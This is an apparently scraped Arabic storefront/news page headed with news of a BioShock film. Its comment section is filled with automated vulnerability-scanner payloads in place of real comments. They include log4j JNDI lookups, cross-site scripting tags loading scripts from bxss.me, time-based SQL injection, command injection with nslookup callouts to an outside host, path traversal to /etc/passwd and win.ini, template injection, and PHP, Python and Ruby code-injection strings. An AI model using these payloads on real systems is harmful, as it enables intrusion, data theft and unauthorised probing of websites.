ے
Search
KWD
English
Shopping cart Close

You have no items in your shopping cart.

Back to all

سلسلة ألعاب BioShock ستحصل على فيلم مخصّص لها

16 Feb 2022

Comments
Leave your comment Close
Mr.

555

Mr.

response.write(9422065*9174640)

Mr.

${j${::-n}di:dns${::-:}${::-/}/hitpxxoubzlvledfc9${::-.}bxss.me}zzzz

Mr.

555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-191147&h=58-edfe9-2&"></script>

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

'+response.write(9422065*9174640)+'

Mr.'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-191148&h=58-edfe9-2&"></script>

555

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitfpvhatvlpu5c3a4${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

echo qaafpa$()\ ycclmu\nz^xyu||a #' &echo qaafpa$()\ ycclmu\nz^xyu||a #|" &echo qaafpa$()\ ycclmu\nz^xyu||a #

Mr.

"+response.write(9422065*9174640)+"

Mr.

&echo lohtja$()\ xksxtb\nz^xyu||a #' &echo lohtja$()\ xksxtb\nz^xyu||a #|" &echo lohtja$()\ xksxtb\nz^xyu||a #

Mr.

555

/../../../../../../../../../../windows/system32/BITSADMIN.exe

555

Mr.

|echo wiueol$()\ krknhd\nz^xyu||a #' |echo wiueol$()\ krknhd\nz^xyu||a #|" |echo wiueol$()\ krknhd\nz^xyu||a #

Mr.

xE4GL9tV

response.write(9990540*9107657)

555

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-191151.58.edfe9${::-.}1${::-.}bxss.me}}

9pszu74N

555

'+response.write(9990540*9107657)+'

555

Mr.

(nslookup hitnavgbxjnps2b626.bxss.me||perl -e "gethostbyname('hitnavgbxjnps2b626.bxss.me')")

${j${::-n}di:dns${::-:}${::-/}/hitndavvauwisc8c3f${::-.}bxss.me}zzzz

555

"+response.write(9990540*9107657)+"

555

Mr.

$(nslookup hitojibnfmpcp9a710.bxss.me||perl -e "gethostbyname('hitojibnfmpcp9a710.bxss.me')")

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

&(nslookup hitnntyezbzhz7ba12.bxss.me||perl -e "gethostbyname('hitnntyezbzhz7ba12.bxss.me')")&'\"`0&(nslookup hitnntyezbzhz7ba12.bxss.me||perl -e "gethostbyname('hitnntyezbzhz7ba12.bxss.me')")&`'

Mr.

file:///etc/passwd

Mr.

555
bcc:074625.58-191152.58.edfe9.19244.2@bxss.me

Mr.

555

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-191153.58.edfe9${::-.}1${::-.}bxss.me}}

555

Mr.

|(nslookup hitbgzboumqqre9fd6.bxss.me||perl -e "gethostbyname('hitbgzboumqqre9fd6.bxss.me')")

Mr.

to@example.com>
bcc:074625.58-191154.58.edfe9.19244.2@bxss.me

Mr.

../555

Mr. bcc:074625.58-191155.58.edfe9.19244.2@bxss.me

555

Mr.

`(nslookup hitgqfmzzycyw50576.bxss.me||perl -e "gethostbyname('hitgqfmzzycyw50576.bxss.me')")`

../../../../../../../../../../../../../../etc/passwd

555

Mr.

555

to@example.com> bcc:074625.58-191156.58.edfe9.19244.2@bxss.me

555

Mr.

;(nslookup hitofehwpyhwo86072.bxss.me||perl -e "gethostbyname('hitofehwpyhwo86072.bxss.me')")|(nslookup hitofehwpyhwo86072.bxss.me||perl -e "gethostbyname('hitofehwpyhwo86072.bxss.me')")&(nslookup hitofehwpyhwo86072.bxss.me||perl -e "gethostbyname('hitofehwpyhwo86072.bxss.me')")

../../../../../../../../../../../../../../windows/win.ini

555

file:///etc/passwd

555

echo olvcgy$()\ nemmjl\nz^xyu||a #' &echo olvcgy$()\ nemmjl\nz^xyu||a #|" &echo olvcgy$()\ nemmjl\nz^xyu||a #

555

Mr.

555

Mr.

555<esi:include src="http://bxss.me/rpb.png"/>

Mr.

555

&echo nulbdo$()\ ajjqda\nz^xyu||a #' &echo nulbdo$()\ ajjqda\nz^xyu||a #|" &echo nulbdo$()\ ajjqda\nz^xyu||a #

555

Mr.<esi:include src="http://bxss.me/rpb.png"/>

555

Mr.

555

../Mr.

555

|echo fejxvh$()\ ncjaik\nz^xyu||a #' |echo fejxvh$()\ ncjaik\nz^xyu||a #|" |echo fejxvh$()\ ncjaik\nz^xyu||a #

555

(nslookup hitaorwswitkz4b97e.bxss.me||perl -e "gethostbyname('hitaorwswitkz4b97e.bxss.me')")

555

Mr.

${9999217+9999290}

Mr.

555

$(nslookup hitlulehnxbcz60d72.bxss.me||perl -e "gethostbyname('hitlulehnxbcz60d72.bxss.me')")

555

${9999094+9999081}

555

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

&(nslookup hitjhxxropkze0071a.bxss.me||perl -e "gethostbyname('hitjhxxropkze0071a.bxss.me')")&'\"`0&(nslookup hitjhxxropkze0071a.bxss.me||perl -e "gethostbyname('hitjhxxropkze0071a.bxss.me')")&`'

555

Mr.

555&n976895=v997318

Mr.

555

Mr.

Http://bxss.me/t/fit.txt

|(nslookup hitgndwfbtkgubb6c2.bxss.me||perl -e "gethostbyname('hitgndwfbtkgubb6c2.bxss.me')")

555

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

555

Mr.

)

Mr.

/etc/shells

`(nslookup hitkhvfewensuc3ed4.bxss.me||perl -e "gethostbyname('hitkhvfewensuc3ed4.bxss.me')")`

555

Mr.

!(()&&!|*|*|

Mr.&n930707=v991788

555

Mr.

c:/windows/win.ini

Mr.

^(#$!@#$)(()))******

Mr.

bxss.me

Mr.

'"()

)

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.

555

Mr.

555

!(()&&!|*|*|

555

^(#$!@#$)(()))******

555

Http://bxss.me/t/fit.txt

555

Mr.

555

Mr.

555

http://bxss.me/t/fit.txt?.

555

Mr.

555'&&sleep(27*1000)*mkttyz&&'

/etc/shells

555

Mr.

555"&&sleep(27*1000)*iwwjgy&&"

c:/windows/win.ini

555

Mr.

555

Mr.

555'||sleep(27*1000)*fzynay||'

bxss.me

555

Mr.

555"||sleep(27*1000)*wuznxa||"

Mr.

'.gethostbyname(lc('hitvj'.'xczubvffb1ee4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(87).chr(117).chr(82).'

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

'"()

555

Mr.

".gethostbyname(lc("hitzq"."delehhcr7853c.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(88).chr(103).chr(86)."

Mr.

555

Mr.

';print(md5(31337));$a='

Mr.

";print(md5(31337));$a="

'.gethostbyname(lc('hitub'.'msambknk30e2c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(90).chr(108).chr(86).'

555

Mr.

${@print(md5(31337))}

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitugmmvknscw3a2db.'+'bxss.me')

Mr.

${@print(md5(31337))}\

Mr.'&&sleep(27*1000)*hrkxsm&&'

555

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitugmmvknscw3a2db."+"bxss.me")+'

".gethostbyname(lc("hitji"."tlwmvgxe9a5f7.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(85).chr(114).chr(90)."

555

Mr.

'.print(md5(31337)).'

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitugmmvknscw3a2db.'+'bxss.me')+"

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

Mr."&&sleep(27*1000)*lhugcx&&"

555

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitqptavdrhtz78c2b.'+'bxss.me')

555

';print(md5(31337));$a='

555

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitqptavdrhtz78c2b."+"bxss.me")+'

555

Mr.'||sleep(27*1000)*afaxpd||'

555

Mr."||sleep(27*1000)*rfjvyz||"

555

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitqptavdrhtz78c2b.'+'bxss.me')+"

555

";print(md5(31337));$a="

555

${@print(md5(31337))}

555

${@print(md5(31337))}\

555

Mr.

555

'.print(md5(31337)).'

555

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

555

Mr.

"+"A".concat(70-3).concat(22*4).concat(111).concat(78).concat(99).concat(79)+(require"socket"
Socket.gethostbyname("hitig"+"vfdknymrace72.bxss.me.")[3].to_s)+"

Mr.

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7

Mr.

http://hitswtbhyfmop.bxss.me/

bxss.me/t/xss.html?%00

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(98).concat(87).concat(122).concat(65)+(require'socket'
Socket.gethostbyname('hitjv'+'clepissf02db0.bxss.me.')[3].to_s)+'

http://hitnalywebifs.bxss.me/

555

Mr.

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7/.

"+"A".concat(70-3).concat(22*4).concat(115).concat(67).concat(118).concat(70)+(require"socket" Socket.gethostbyname("hithu"+"ybsocnal4c205.bxss.me.")[3].to_s)+"

555

Mr.

555

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7

555

Mr.

555

'+'A'.concat(70-3).concat(22*4).concat(115).concat(69).concat(121).concat(86)+(require'socket' Socket.gethostbyname('hitcl'+'nsohtahi31bac.bxss.me.')[3].to_s)+'

555

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7/.

555

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

/xfs.bxss.me

Mr.

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

/xfs.bxss.me

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

-1 OR 2+647-647-1=0+0+0+1 --

Mr.

'"

Mr.

-1 OR 2+186-186-1=0+0+0+1

Mr.

555'"()&%<zzz><ScRiPt >VFdr(9251)</ScRiPt>

Mr.

<!--

Mr.

-1' OR 2+417-417-1=0+0+0+1 --

'"

555

<!--

555

Mr.

'"()&%<zzz><ScRiPt >VFdr(9181)</ScRiPt>

Mr.

-1' OR 2+535-535-1=0+0+0+1 or 'mnK63Vn6'='

Mr.

-1" OR 2+51-51-1=0+0+0+1 --

Mr.

5559083284

Mr.

bfg2675<s1﹥s2ʺs3ʹhjl2675

Mr.

bfgx3522%C0%BEz1%C0%BCz2a%90bcxhjl3522

Mr.

<%={{={@{#{${dfb}}%>

Mr.

<th:t="${dfb}#foreach

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

dfb{{98991*97996}}xca

Mr.

dfb[[${98991*97996}]]xca

Mr.

dfb__${98991*97996}__::.x

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

555<ScRiPt >VFdr(9682)</ScRiPt>

Mr.

555<WVU21I>PP6IG[!+!]</WVU21I>

Mr.

555<script>VFdr(9377)</script>

Mr.

555<ScR<ScRiPt>IpT>VFdr(9621)</sCr<ScRiPt>IpT>

Mr.

555<ScRiPt
>VFdr(9172)</ScRiPt>

Mr.

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9127></ScRiPt>

Mr.

555<isindex type=image src=1 onerror=VFdr(9450)>

Mr.

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9153'>

Mr.

555<body onload=VFdr(9285)>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

555<img src=//xss.bxss.me/t/dot.gif onload=VFdr(9363)>

Mr.

555<img src=xyz OnErRor=VFdr(9156)>

Mr.

555<img/src=">" onerror=alert(9781)>

Mr.

%35%35%35%3C%53%63%52%69%50%74%20%3E%56%46%64%72%289840%29%3C%2F%73%43%72%69%70%54%3E

Mr.

555\u003CScRiPt\VFdr(9000)\u003C/sCripT\u003E

Mr.

555&lt;ScRiPt&gt;VFdr(9717)&lt;/sCripT&gt;

Mr.

%F6<img zzz onmouseover=VFdr(96841) //%F6>

Mr.

555<input autofocus onfocus=VFdr(9701)>

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

555}body{zzz:Expre/**/SSion(VFdr(9638))}

Mr.

555fxZjY
<ScRiPt >VFdr(9633)</ScRiPt>

Mr.

555<WUS9RJ>S8WFF[!+!]</WUS9RJ>

Mr.

555<ifRAme sRc=9563.com></IfRamE>

Mr.

555<aeKNaIP x=9789>

Mr.

555<img sRc='http://attacker-9535/log.php?

Mr.

555<aYUkybQ<

Mr.'"()&%<zzz><ScRiPt >VFdr(9395)</ScRiPt>

555

'"()&%<zzz><ScRiPt >VFdr(9297)</ScRiPt>

555

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.9956534

555

bfg3677<s1﹥s2ʺs3ʹhjl3677

555

bfgx10844%C0%BEz1%C0%BCz2a%90bcxhjl10844

555

<%={{={@{#{${dfb}}%>

555

<th:t="${dfb}#foreach

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

dfb{{98991*97996}}xca

555

dfb[[${98991*97996}]]xca

555

dfb__${98991*97996}__::.x

555

Mr.

-1; waitfor delay '0:0:15' --

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

Mr.<ScRiPt >VFdr(9250)</ScRiPt>

555

Mr.<WMOKEU>DUGYO[!+!]</WMOKEU>

555

Mr.<script>VFdr(9399)</script>

555

Mr.<ScR<ScRiPt>IpT>VFdr(9420)</sCr<ScRiPt>IpT>

555

Mr.<ScRiPt >VFdr(9655)</ScRiPt>

555

Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9436></ScRiPt>

555

Mr.<isindex type=image src=1 onerror=VFdr(9932)>

555

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9227'>

555

Mr.

-1); waitfor delay '0:0:15' --

Mr.<body onload=VFdr(9243)>

555

Mr.<img src=//xss.bxss.me/t/dot.gif onload=VFdr(9110)>

555

Mr.<img src=xyz OnErRor=VFdr(9211)>

555

Mr.<img/src=">" onerror=alert(9010)>

555

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%56%46%64%72%289501%29%3C%2F%73%43%72%69%70%54%3E

555

Mr.\u003CScRiPt\VFdr(9360)\u003C/sCripT\u003E

555

Mr.&lt;ScRiPt&gt;VFdr(9546)&lt;/sCripT&gt;

555

Mr.

-1)); waitfor delay '0:0:15' --

%F6<img zzz onmouseover=VFdr(91621) //%F6>

555

Mr.<input autofocus onfocus=VFdr(9826)>

555

<a HrEF=http://xss.bxss.me></a>

555

<a HrEF=jaVaScRiPT:>

555

Mr.}body{zzz:Expre/**/SSion(VFdr(9189))}

555

Mr.vEKJ8 <ScRiPt >VFdr(9839)</ScRiPt>

555

Mr.<W8CQNF>4N1RQ[!+!]</W8CQNF>

555

Mr.<ifRAme sRc=9765.com></IfRamE>

555

Mr.

1 waitfor delay '0:0:15' --

Mr.<ab63SAG x=9255>

555

Mr.<img sRc='http://attacker-9839/log.php?

555

Mr.<a3ev5vJ<

555

Mr.

555

Mr.

WUPOBDsP'; waitfor delay '0:0:15' --

Mr.

555

Mr.

nv9bN6sM'); waitfor delay '0:0:15' --

Mr.

QNmzoyIr')); waitfor delay '0:0:15' --

Mr.

-5 OR 763=(SELECT 763 FROM PG_SLEEP(15))--

Mr.

-5) OR 708=(SELECT 708 FROM PG_SLEEP(15))--

Mr.

-1)) OR 137=(SELECT 137 FROM PG_SLEEP(15))--

Mr.

HyebFfRW' OR 435=(SELECT 435 FROM PG_SLEEP(15))--

Mr.

7Ftb1BBf') OR 487=(SELECT 487 FROM PG_SLEEP(15))--

Mr.

ZJKsRJNG')) OR 119=(SELECT 119 FROM PG_SLEEP(15))--

Mr.

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Mr.

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr.

1'"

Mr.

@@pSfAd

Mr.

555

Mr.

555

-1 OR 2+908-908-1=0+0+0+1 --

555

-1 OR 2+287-287-1=0+0+0+1

555

-1' OR 2+416-416-1=0+0+0+1 --

555

-1' OR 2+926-926-1=0+0+0+1 or 'JfVRrfKb'='

555

-1" OR 2+149-149-1=0+0+0+1 --

555

if(now()=sysdate(),sleep(15),0)

555

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

1 waitfor delay '0:0:15' --

555

Gu9BBtOP'; waitfor delay '0:0:15' --

555

17GKXCQ5'); waitfor delay '0:0:15' --

555

hfiMq8pb')); waitfor delay '0:0:15' --

555

fs1brxdg' OR 39=(SELECT 39 FROM PG_SLEEP(15))--

555

ljWItUiZ') OR 828=(SELECT 828 FROM PG_SLEEP(15))--

555

QEeUkNBh')) OR 56=(SELECT 56 FROM PG_SLEEP(15))--

555

Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

1'"

555

@@6lBPF

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

response.write(9728380*9079803)

Mr.

${j${::-n}di:dns${::-:}${::-/}/hitvfmzmmiagz34c94${::-.}bxss.me}zzzz

Mr.

'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-195194&h=58-edfe9-2&"></script>

Mr.

'+response.write(9728380*9079803)+'

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitftocaonebe883bc${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

"+response.write(9728380*9079803)+"

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-195196.58.edfe9${::-.}1${::-.}bxss.me}}

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

echo wmmwsf$()\ vydniu\nz^xyu||a #' &echo wmmwsf$()\ vydniu\nz^xyu||a #|" &echo wmmwsf$()\ vydniu\nz^xyu||a #

Mr.

94vc2gQX

Mr.

&echo zmhldr$()\ ehyfri\nz^xyu||a #' &echo zmhldr$()\ ehyfri\nz^xyu||a #|" &echo zmhldr$()\ ehyfri\nz^xyu||a #

Mr.

|echo vygqma$()\ llwxec\nz^xyu||a #' |echo vygqma$()\ llwxec\nz^xyu||a #|" |echo vygqma$()\ llwxec\nz^xyu||a #

Mr.

(nslookup hitpbwolvwomx726fd.bxss.me||perl -e "gethostbyname('hitpbwolvwomx726fd.bxss.me')")

Mr.

$(nslookup hitoebetucqhpff21c.bxss.me||perl -e "gethostbyname('hitoebetucqhpff21c.bxss.me')")

Mr.

bcc:074625.58-195201.58.edfe9.19244.2@bxss.me

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

&(nslookup hitpozmedqkvhdc3f6.bxss.me||perl -e "gethostbyname('hitpozmedqkvhdc3f6.bxss.me')")&'\"`0&(nslookup hitpozmedqkvhdc3f6.bxss.me||perl -e "gethostbyname('hitpozmedqkvhdc3f6.bxss.me')")&`'

Mr.

to@example.com>
bcc:074625.58-195202.58.edfe9.19244.2@bxss.me

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

|(nslookup hitemvvqorgtvefb49.bxss.me||perl -e "gethostbyname('hitemvvqorgtvefb49.bxss.me')")

Mr.

file:///etc/passwd

Mr.

`(nslookup hitlhdzckebqkb8110.bxss.me||perl -e "gethostbyname('hitlhdzckebqkb8110.bxss.me')")`

Mr.

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

;(nslookup hitxkueaczwaf0880b.bxss.me||perl -e "gethostbyname('hitxkueaczwaf0880b.bxss.me')")|(nslookup hitxkueaczwaf0880b.bxss.me||perl -e "gethostbyname('hitxkueaczwaf0880b.bxss.me')")&(nslookup hitxkueaczwaf0880b.bxss.me||perl -e "gethostbyname('hitxkueaczwaf0880b.bxss.me')")

Mr.

../

Mr.

${10000422+9999245}

Mr.

./

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Mr.

&n900434=v965606

Mr.

Http://bxss.me/t/fit.txt

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

/etc/shells

Mr.

c:/windows/win.ini

Mr.

)

Mr.

bxss.me

Mr.

!(()&&!|*|*|

Mr.

^(#$!@#$)(()))******

Mr.

'"()

Mr.

'&&sleep(27*1000)*zuryzt&&'

Mr.

"&&sleep(27*1000)*fsejft&&"

Mr.

'||sleep(27*1000)*oafurz||'

Mr.

"||sleep(27*1000)*mkukrb||"

Mr.

'.gethostbyname(lc('hitjn'.'nmqkwnff70c7d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(80).chr(102).chr(76).'

Mr.

-1 OR 2+641-641-1=0+0+0+1 --

Mr.

-1 OR 3+641-641-1=0+0+0+1 --

Mr.

-1 OR 2+762-762-1=0+0+0+1

Mr.

".gethostbyname(lc("hitak"."ozdqjcki3bdbe.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(78).chr(104).chr(82)."

Mr.

-1 OR 3+762-762-1=0+0+0+1

Mr.

-1' OR 2+38-38-1=0+0+0+1 --

Mr.

-1' OR 3+38-38-1=0+0+0+1 --

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

-1' OR 2+649-649-1=0+0+0+1 or 'vLWLASHC'='

Mr.

';print(md5(31337));$a='

Mr.

-1' OR 3+649-649-1=0+0+0+1 or 'vLWLASHC'='

Mr.

";print(md5(31337));$a="

Mr.

-1" OR 2+416-416-1=0+0+0+1 --

Mr.

${@print(md5(31337))}

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

-1" OR 3+416-416-1=0+0+0+1 --

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitqgdgdffjszf55f1.'+'bxss.me')

Mr.

${@print(md5(31337))}\

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitqgdgdffjszf55f1."+"bxss.me")+'

Mr.

'.print(md5(31337)).'

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitqgdgdffjszf55f1.'+'bxss.me')+"

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

bxss.me/t/xss.html?%00

Mr.

"+"A".concat(70-3).concat(22*4).concat(122).concat(80).concat(116).concat(76)+(require"socket"
Socket.gethostbyname("hitjp"+"iliwarbb8953f.bxss.me.")[3].to_s)+"

Mr.

'+'A'.concat(70-3).concat(22*4).concat(116).concat(90).concat(115).concat(73)+(require'socket'
Socket.gethostbyname('hitgi'+'pzltxgwyc9e03.bxss.me.')[3].to_s)+'

Mr.

http://hitggzvbzmkhz.bxss.me/

Mr.

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7

Mr.

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7/.

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

/xfs.bxss.me

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

'"

Mr.

'"()&%<zzz><ScRiPt >hNEo(9852)</ScRiPt>

Mr.

<!--

Mr.

'"()&%<zzz><ScRiPt >hNEo(9151)</ScRiPt>

Mr.

9760146

Mr.

bfg9135<s1﹥s2ʺs3ʹhjl9135

Mr.

bfgx3356%C0%BEz1%C0%BCz2a%90bcxhjl3356

Mr.

<%={{={@{#{${dfb}}%>

Mr.

&#xD;&#xA;

Mr.

<th:t="${dfb}#foreach

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

dfb{{98991*97996}}xca

Mr.

dfb[[${98991*97996}]]xca

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

dfb__${98991*97996}__::.x

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

${j${::-n}di:dns${::-:}${::-/}/hithnoxjhqqlu0c513${::-.}bxss.me}zzzz

Mr.

response.write(9285794*9984367)

Mr.

&#xD;&#xA;'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-195497&h=58-edfe9-2&"></script>

Mr.

'+response.write(9285794*9984367)+'

Mr.

"+response.write(9285794*9984367)+"

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hititriisfrzzd5c65${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-195498&h=58-edfe9-2&"></script>

&#xD;&#xA;

Mr.

<ScRiPt >hNEo(9203)</ScRiPt>

response.write(9481908*9739439)

&#xD;&#xA;

/../../../../../../../../../../windows/system32/BITSADMIN.exe

&#xD;&#xA;

'+response.write(9481908*9739439)+'

&#xD;&#xA;

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-195500.58.edfe9${::-.}1${::-.}bxss.me}}

Mr.

&#xD;&#xA;

Mr.

<WGTMVV>TXKFR[!+!]</WGTMVV>

${j${::-n}di:dns${::-:}${::-/}/hitavvxvadfkh1b7de${::-.}bxss.me}zzzz

&#xD;&#xA;

Mr.

echo rakjtc$()\ vxkfhl\nz^xyu||a #' &echo rakjtc$()\ vxkfhl\nz^xyu||a #|" &echo rakjtc$()\ vxkfhl\nz^xyu||a #

"+response.write(9481908*9739439)+"

&#xD;&#xA;

Mr.

uDt9ELWf

Mr.

&echo vszrpk$()\ yzuwrf\nz^xyu||a #' &echo vszrpk$()\ yzuwrf\nz^xyu||a #|" &echo vszrpk$()\ yzuwrf\nz^xyu||a #

X8JxFpWr

&#xD;&#xA;

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

|echo xdsgbe$()\ yeiqfg\nz^xyu||a #' |echo xdsgbe$()\ yeiqfg\nz^xyu||a #|" |echo xdsgbe$()\ yeiqfg\nz^xyu||a #

Mr.

(nslookup hitetoeeotuucf0768.bxss.me||perl -e "gethostbyname('hitetoeeotuucf0768.bxss.me')")

Mr.

../../../../../../../../../../../../../../windows/win.ini

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-195502.58.edfe9${::-.}1${::-.}bxss.me}}

&#xD;&#xA;

Mr.

file:///etc/passwd

Mr.

